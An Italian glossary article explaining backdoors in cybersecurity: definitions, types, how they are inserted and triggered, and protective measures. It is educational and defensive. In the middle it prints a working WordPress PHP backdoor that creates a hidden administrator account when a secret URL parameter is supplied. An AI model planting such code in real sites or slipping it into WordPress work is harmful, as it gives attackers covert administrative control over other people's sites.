In cyber security una backdoor è probabilmente la minaccia più grave che esista.
Come la definisce il NIST, è “un modo non ufficiale per ottenere accesso a un sistema informatico e rappresenta un potenziale rischio per la sicurezza”.
L’importanza di queste vulnerabilità sta nel loro potenziale di essere sfruttate per accedere ad un sistema con privilegi di root. Il report annuale di TrendMicro del 2022 ha registrato un notevole aumento di rilevamenti backdoor (86,2%) nel 2022 in confronto al 2021. Questo aumento ha portato le backdoor a essere la quarta principale minaccia, dietro a virus, worm e ramsomware.
Cos’è una backdoor
Una backdoor funziona pertanto come una porta nascosta in un sistema informatico, permettendo a chi ne è a conoscenza di accedere senza passare dalle usuali procedure di sicurezza. Queste vie di accesso possono essere create volontariamente per scopi di manutenzione, o inserite da malintenzionati per accedere illecitamente a informazioni riservate.
L’importanza delle backdoor
La presenza di backdoor in un sistema, come già evidenziato, è un aspetto critico per la sicurezza. Possono essere sfruttate da malintenzionati per furti di dati, diffusione di malware o per prendere il controllo di un intero sistema. Riconoscerle e saperle gestire è di fondamentale importanza.
Diverse tipologie di backdoor
Le backdoor si presentano in diverse forme:
- Intenzionali: inserite dagli sviluppatori e produttori, possono essere utili per manutenzione o test, ma diventano rischiose se mal gestite.
- Involontarie: nascono da errori di programmazione e possono creare vulnerabilità inaspettate.
- Di rete: inserite in dispositivi come router o switch, per monitorare o controllare il traffico di rete.
- In hardware: incorporate nei circuiti di un dispositivo, sono particolarmente insidiose perché difficili da individuare.
Come operano le backdoor
Le backdoor possono essere integrate in un sistema informatico attraverso diversi metodi:
- inserendo codice nocivo direttamente nel sistema durante le fasi di sviluppo o di aggiornamento.
- utilizzando exploit per prendere vantaggio di debolezze presenti nel sistema.
- accedendo fisicamente al sistema e inserendo manualmente il codice pericoloso.
Dopo l’inserimento, l’attivazione della backdoor può avvenire in vari modi, inclusi:
- eseguendo un comando predeterminato.
- utilizzando una password specifica per attivarla.
- reagendo a determinati eventi, come l’avvio del sistema o l’esecuzione di un’applicazione specifica.
Esempio di backdoor in un sito web WordPress
Il seguente codice è di fatto una backdoor in PHP per un sito WordPress.
<?php
add_action('wp_head', 'wp_backdoor');
function wp_backdoor() {
If ($_GET['entryhook'] == 'apritisesamo') {
require('wp-includes/registration.php');
If (!username_exists('username')) {
$user_id = wp_create_user('name', 'pass');
$user = new WP_User($user_id);
$user->set_role('administrator');
}
}
}
?>Il codice inserito in un tema o plugin di WordPress, crea un utente amministratore nel database WP se viene visitata una specifica URL con un parametro particolare (?entryhook=apritisesamo).
Come proteggersi dalle backdoor
Per proteggersi dalle backdoor è dunque consigliabile:
- Mantenere aggiornati software e firmware.
- Fare penetration testing.
- Utilizzare un software antivirus, antimalware e antirootkit aggiornato.
- Utilizzare un firewall correttamente configurato.
- Effettuare controlli regolari del codice sorgente.
- Implementare solide misure di sicurezza di rete.
- Fare backup dei dati regolarmente.
More from Glossario
Spyware
Gli spyware sono software "silenziosi" e pervasivi, rubano dati personali compromettendo la privacy. Imparare a riconoscerli e a difendersi è …
